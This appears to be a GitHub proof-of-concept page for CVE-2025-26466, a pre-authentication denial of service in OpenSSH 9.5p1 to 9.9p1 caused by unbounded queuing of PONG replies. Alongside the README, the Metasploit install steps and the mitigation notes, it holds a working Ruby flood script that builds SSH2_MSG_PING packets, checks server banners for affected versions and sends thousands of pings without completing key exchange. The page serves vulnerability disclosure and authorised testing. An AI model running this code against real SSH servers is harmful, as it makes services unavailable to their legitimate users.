
CVE-2025-26466 PoC — Openssh: denial-of-service in openssh

Associated Vulnerability
Title:Openssh: denial-of-service in openssh (CVE-2025-26466)
Description: A flaw was found in the OpenSSH package. For each ping packet the SSH server receives, a pong packet is allocated in a memory buffer and stored in a queue of packets. It is only freed when the server/client key exchange has finished. A malicious client may keep sending such packets, leading to an uncontrolled increase in memory consumption on the server side. Consequently, the server may become unavailable, resulting in a denial of service.
Description
CVE-2025-26466 - SSH Ping DoS Ruby module for Metasploit Framework
Readme
# CVE-2025-26466 (Metasploit module)

OpenSSH 9.5p1 through 9.9p1 is vulnerable to a pre-authentication memory and CPU exhaustion denial of service. A client that keeps sending SSH2_MSG_PING packets (message type 192) makes the server allocate and queue an SSH2_MSG_PONG reply for every one of them, and those queued replies are only released once the key exchange completes. Because the client never has to complete the key exchange, the queue grows without bound and the server can become unresponsive. The fix shipped in OpenSSH 9.9p2; the Qualys advisory under References notes that `LoginGraceTime`, `MaxStartups` and (on 9.8 and later) `PerSourcePenalties` limit how much a single source can consume, so check those settings before assuming an unpatched host is trivially exhaustible.
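The exchange described above, written out in plain Ruby as an added example (this is not the page's `ping_dos.rb` and not Metasploit project code): `build_ping_packet` produces the unencrypted SSH2 binary packet that carries an SSH2_MSG_PING, `affected_banner?` flags the version range named above, and `ping_flood` completes only the version exchange and then writes pings without ever finishing the key exchange. The function and constant names, the client identification string, the default payload sizes and the `parse_packet` helper are assumptions of this example, as is the premise, taken from the description above, that the server answers pings that arrive during the initial key exchange.

```ruby
require 'socket'

# OpenSSH's PING/PONG transport extension uses message numbers 192/193,
# in the range RFC 4253 reserves for local extensions.
SSH2_MSG_PING = 192
SSH2_MSG_PONG = 193

# Build one SSH2 binary packet (RFC 4253 section 6) carrying SSH2_MSG_PING:
#
#   uint32 packet_length | byte padding_length | payload | padding
#
# Pings are sent before NEWKEYS, so no cipher is active: the block size is 8
# and at least 4 bytes of padding are required. PING's payload is the message
# byte followed by an SSH "string" (uint32 length + bytes). The server copies
# that string into the PONG it queues, so a bigger `data` means a bigger
# allocation per ping (assumption of this example: stay well below the
# 256 KiB packet limit so the packet is not rejected outright).
def build_ping_packet(data = "")
  data = data.b
  payload = [SSH2_MSG_PING].pack("C") + [data.bytesize].pack("N") + data
  block = 8
  pad = block - ((4 + 1 + payload.bytesize) % block)
  pad += block if pad < 4
  packet_length = 1 + payload.bytesize + pad
  # Padding should be random; zeros are fine here because the packet is
  # unencrypted and its padding bytes are never inspected.
  [packet_length].pack("N") + [pad].pack("C") + payload + ("\x00" * pad)
end

# Split a raw packet back into its fields (hypothetical helper, used to
# sanity-check the builder).
def parse_packet(raw)
  packet_length = raw[0, 4].unpack1("N")
  pad = raw[4].ord
  payload = raw[5, packet_length - 1 - pad]
  { packet_length: packet_length, padding_length: pad,
    type: payload[0].ord, data: payload[5, payload[1, 4].unpack1("N")] }
end

# Versions named above: OpenSSH 9.5p1 up to and including 9.9p1 (fixed in
# 9.9p2). Distribution packages often backport the fix without changing the
# banner, so treat a match as "needs checking", not "confirmed vulnerable".
def affected_banner?(banner)
  m = banner.match(/OpenSSH_(\d+)\.(\d+)(?:p(\d+))?/)
  return false unless m
  major, minor, portable = m[1].to_i, m[2].to_i, (m[3] || 1).to_i
  major == 9 && minor.between?(5, 9) && !(minor == 9 && portable >= 2)
end

# Connect, finish only the version exchange, then write `count` pings and
# hold the connection open. The server answers each ping with a PONG that
# sits in its outgoing queue until key exchange completes, which never
# happens here. `client_version` is an arbitrary identification string.
def ping_flood(host, port: 22, count: 10_000, data: "A" * 4096, hold: 60,
               client_version: "SSH-2.0-ping_dos_example")
  sock = TCPSocket.new(host, port)
  banner = sock.readline.strip              # e.g. "SSH-2.0-OpenSSH_9.9p1"
  sock.write("#{client_version}\r\n")
  warn "#{banner} does not look like an affected version" unless affected_banner?(banner)
  pkt = build_ping_packet(data)
  count.times { sock.write(pkt) }
  sleep hold   # LoginGraceTime (default 120 s) will eventually close the session
  banner
ensure
  sock&.close
end

# Run directly as: ruby ping_flood_example.rb <host> [port]
# Nothing is sent when the file is merely loaded without arguments.
if $PROGRAM_NAME == __FILE__ && !ARGV.empty?
  ping_flood(ARGV[0], port: (ARGV[1] || 22).to_i)
end
```

Only run it against a host you are authorised to test; a single connection is enough to see the server's memory climb, and repeating it from several connections is exactly what `MaxStartups` and `PerSourcePenalties` are there to bound.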

## More information about this CVE

- https://nvd.nist.gov/vuln/detail/CVE-2025-26466

## How do I run this script?

Copy the .rb file into the `auxiliary/dos/ssh` directory of your Metasploit modules tree, e.g.

`/usr/share/metasploit-framework/modules/auxiliary/dos/ssh`

Start the Metasploit console and search for the module (run `reload_all` first if the console was already open when you copied the file):

```
msfconsole
search ping_dos
```

## References

- https://blog.qualys.com/vulnerabilities-threat-research/2025/02/18/qualys-tru-discovers-two-vulnerabilities-in-openssh-cve-2025-26465-cve-2025-26466


## Disclaimer

I am sharing this just for educational purposes, you shall not use it on infrastructure you are not authorized to.

## Issues

That's my first project shared on GitHub. Feel free to leave comments about it, so I can learn and make it better.
File Snapshot

```
/data/pocs/194b3e29f7965628f38c95f7beef1f88e9bf12db
├── ping_dos.rb  (2.2K)
└── README.md    (1.0K)
0 directories, 2 files
```